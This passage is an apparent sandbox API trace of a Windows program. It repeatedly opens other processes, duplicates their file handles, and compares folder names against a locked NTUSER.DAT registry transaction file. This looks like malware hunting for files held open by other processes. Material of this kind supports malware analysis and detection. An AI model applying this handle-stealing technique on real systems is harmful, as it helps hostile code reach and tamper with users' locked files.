bInheritHandle=0, dwProcessId=0x8a0) returned 0x1e8 [0166.514] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.515] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.516] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.516] CloseHandle (hObject=0x1e4) returned 1 [0166.516] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.516] CloseHandle (hObject=0x194) returned 1 [0166.516] CloseHandle (hObject=0x1e8) returned 1 [0166.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0166.516] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.517] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.518] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.518] CloseHandle (hObject=0x1e4) returned 1 [0166.518] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.518] CloseHandle (hObject=0x194) returned 1 [0166.518] CloseHandle (hObject=0x1e8) returned 1 [0166.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b0) returned 0x1e8 [0166.518] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.519] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.520] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.520] CloseHandle (hObject=0x1e4) returned 1 [0166.520] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.520] CloseHandle (hObject=0x194) returned 1 [0166.521] CloseHandle (hObject=0x1e8) returned 1 [0166.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0166.521] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.522] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.522] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.522] CloseHandle (hObject=0x1e4) returned 1 [0166.523] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.523] CloseHandle (hObject=0x194) returned 1 [0166.523] CloseHandle (hObject=0x1e8) returned 1 [0166.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c0) returned 0x1e8 [0166.523] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.524] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.525] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.525] CloseHandle (hObject=0x1e4) returned 1 [0166.525] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.525] CloseHandle (hObject=0x194) returned 1 [0166.525] CloseHandle (hObject=0x1e8) returned 1 [0166.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0166.525] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.526] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.527] CloseHandle (hObject=0x1e4) returned 1 [0166.527] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.527] CloseHandle (hObject=0x194) returned 1 [0166.527] CloseHandle (hObject=0x1e8) returned 1 [0166.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d0) returned 0x1e8 [0166.527] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.528] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.529] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.529] CloseHandle (hObject=0x1e4) returned 1 [0166.529] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.529] CloseHandle (hObject=0x194) returned 1 [0166.529] CloseHandle (hObject=0x1e8) returned 1 [0166.529] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0166.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.530] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.531] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.531] CloseHandle (hObject=0x1e4) returned 1 [0166.531] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.531] CloseHandle (hObject=0x194) returned 1 [0166.531] CloseHandle (hObject=0x1e8) returned 1 [0166.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e0) returned 0x1e8 [0166.531] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.532] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.533] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.533] CloseHandle (hObject=0x1e4) returned 1 [0166.533] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.533] CloseHandle (hObject=0x194) returned 1 [0166.533] CloseHandle (hObject=0x1e8) returned 1 [0166.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0166.533] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.534] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.535] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.536] CloseHandle (hObject=0x1e4) returned 1 [0166.536] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.536] CloseHandle (hObject=0x194) returned 1 [0166.536] CloseHandle (hObject=0x1e8) returned 1 [0166.536] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f0) returned 0x1e8 [0166.536] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.537] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.537] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.537] CloseHandle (hObject=0x1e4) returned 1 [0166.538] _wcsicmp (_Str1="\\Mozilla Firefox", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.538] CloseHandle (hObject=0x194) returned 1 [0166.538] CloseHandle (hObject=0x1e8) returned 1 [0166.538] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0166.538] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.538] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.539] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.539] CloseHandle (hObject=0x1e4) returned 1 [0166.539] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.539] CloseHandle (hObject=0x194) returned 1 [0166.539] CloseHandle (hObject=0x1e8) returned 1 [0166.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x900) returned 0x1e8 [0166.539] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.540] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.541] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.541] CloseHandle (hObject=0x1e4) returned 1 [0166.541] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.541] CloseHandle (hObject=0x194) returned 1 [0166.542] CloseHandle (hObject=0x1e8) returned 1 [0166.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0166.542] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.543] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.543] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.543] CloseHandle (hObject=0x1e4) returned 1 [0166.543] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.544] CloseHandle (hObject=0x194) returned 1 [0166.544] CloseHandle (hObject=0x1e8) returned 1 [0166.544] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x910) returned 0x1e8 [0166.544] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.545] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.545] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.546] CloseHandle (hObject=0x1e4) returned 1 [0166.546] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0166.546] CloseHandle (hObject=0x194) returned 1 [0166.546] CloseHandle (hObject=0x1e8) returned 1 [0166.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0166.546] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.547] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.547] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.548] CloseHandle (hObject=0x1e4) returned 1 [0166.548] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.548] CloseHandle (hObject=0x194) returned 1 [0166.548] CloseHandle (hObject=0x1e8) returned 1 [0166.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x920) returned 0x1e8 [0166.548] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.549] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.549] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.549] CloseHandle (hObject=0x1e4) returned 1 [0166.549] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.550] CloseHandle (hObject=0x194) returned 1 [0166.550] CloseHandle (hObject=0x1e8) returned 1 [0166.550] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0166.550] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.551] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.551] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.552] CloseHandle (hObject=0x1e4) returned 1 [0166.552] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.552] CloseHandle (hObject=0x194) returned 1 [0166.552] CloseHandle (hObject=0x1e8) returned 1 [0166.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x930) returned 0x1e8 [0166.552] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.553] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.553] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.553] CloseHandle (hObject=0x1e4) returned 1 [0166.553] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.553] CloseHandle (hObject=0x194) returned 1 [0166.554] CloseHandle (hObject=0x1e8) returned 1 [0166.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0166.554] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.555] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.555] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.556] CloseHandle (hObject=0x1e4) returned 1 [0166.556] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.556] CloseHandle (hObject=0x194) returned 1 [0166.556] CloseHandle (hObject=0x1e8) returned 1 [0166.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x940) returned 0x1e8 [0166.556] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.557] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.557] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.558] CloseHandle (hObject=0x1e4) returned 1 [0166.558] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.558] CloseHandle (hObject=0x194) returned 1 [0166.558] CloseHandle (hObject=0x1e8) returned 1 [0166.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0166.558] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.559] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.559] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.559] CloseHandle (hObject=0x1e4) returned 1 [0166.559] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.559] CloseHandle (hObject=0x194) returned 1 [0166.560] CloseHandle (hObject=0x1e8) returned 1 [0166.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x950) returned 0x1e8 [0166.560] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.560] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.561] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.562] CloseHandle (hObject=0x1e4) returned 1 [0166.562] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.562] CloseHandle (hObject=0x194) returned 1 [0166.562] CloseHandle (hObject=0x1e8) returned 1 [0166.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0166.562] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.563] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.563] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.563] CloseHandle (hObject=0x1e4) returned 1 [0166.563] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.564] CloseHandle (hObject=0x194) returned 1 [0166.564] CloseHandle (hObject=0x1e8) returned 1 [0166.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x960) returned 0x1e8 [0166.564] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.565] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.565] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: 